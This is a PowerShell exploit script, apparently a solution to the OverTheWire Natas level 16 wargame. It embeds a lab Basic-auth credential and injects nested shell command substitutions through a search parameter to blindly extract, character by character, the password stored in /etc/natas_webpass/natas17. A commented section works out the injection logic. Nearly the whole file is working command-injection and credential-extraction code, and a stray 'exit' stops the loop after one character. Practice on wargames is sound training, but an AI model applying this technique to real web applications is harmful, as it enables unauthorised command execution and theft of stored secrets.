$authorization = "Basic bmF0YXMxNjpoUGtqS1l2aUxRY3RFVzMzUW11WEw2ZURWZk1XNHNHbw=="

$headers = @{
    "Authorization" = $authorization
    "Content-Type"  = "application/x-www-form-urlencoded"
} 

$correctStr = "British"

$lowercaseChars = 97..122 | ForEach-Object { [char]$_ }
$uppercaseChars = 65..90 | ForEach-Object { [char]$_ }
$numbers = 48..57 | ForEach-Object { [char]$_ }

$all_characters = $lowercaseChars + $uppercaseChars + $numbers

$result = ""
for ($position = 1; $position -le 32; $position ++) {
    foreach ($char in $all_characters) {        
        $command = '$(cut -c 2 <<<$(grep $(grep $(grep $(echo '+$char+') <<<$(cut -c '+$position+' /etc/natas_webpass/natas17)) <<<$(echo '+$char+')) <<<$(echo '+$char+'B)))'
        # $command = 'british'
        
        $Bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
        $EncodedText =[Convert]::ToBase64String($Bytes)

        $url = "http://natas16.natas.labs.overthewire.org/?needle=$command&submit=Search"                
        $url = [URI]::EscapeUriString($url)

        $response = Invoke-WebRequest -Uri $url -Headers $headers -Method Get
        if ($response) {
            if ($response.Content -like "*$correctStr*") {
                $result += $char
                Write-Host "Correct Char found:"$position ":$char"
                break
            } else {
                write-host "Wrong: $char"
            }

        }
    }
    exit
}
write-host ""
write-host "PASSWORD: $result"

<#

#CHAR        #POSITION+#FILE             #CHAR          #CHAR+'B'          
$(cut -c 2 <<< $(grep $(grep $(grep "a" <<< $(cut -c 2 password)) <<< $(echo a)) <<< $(echo aB)))

$(cut -c 2 <<< $(grep $(grep $(grep "a" <<< $(cut -c 1 password)) <<< $(echo a)) <<< $(echo aB)))
# cut -c 2 <<< $(grep $(grep $(grep "a" <<< $(cut -c 2 password)) <<< $(echo a)) <<< $(echo aB))
# grep $(grep $(grep $(grep "a" <<< $(cut -c 2 password)) <<< $(echo a)) <<< $(echo aB)) <<< $(echo B)
# grep $(grep $(grep "a" <<< $(cut -c 2 password)) <<< $(echo a)) <<< $(echo aB)



grep -i $(grep -i $(grep -i "a" <<< cut -c 1 password) <<< $(echo a)) <<< $(echo "B")

#if something returned, then ECHO B|||||
grep -i $(grep -i $(grep -i "a" <<< cut -c 1 password) <<< $(echo a)) <<< $(echo "B") #  grep $(grep $(grep "p" <<< $(cut -c 1 password)) <<< $(echo p)) <<< $(echo "B")

# then return SOMETHING        #CHAR
grep -i $(grep -i "p" <<< cut -c 1 password) <<< $(echo p)               #       -> grep $(grep "p" <<< $(cut -c 1 password)) <<< $(echo p)
#CHAR        #POSITION
$(grep -i "p" <<< cut -c 1 password) # if (CHAR exists in PASSWORDCHARACTER(POSITION))



#CHAR = 'a'
#or
#CHAR = ''

grep -i "1" <<< $(cut -c1 password)
#>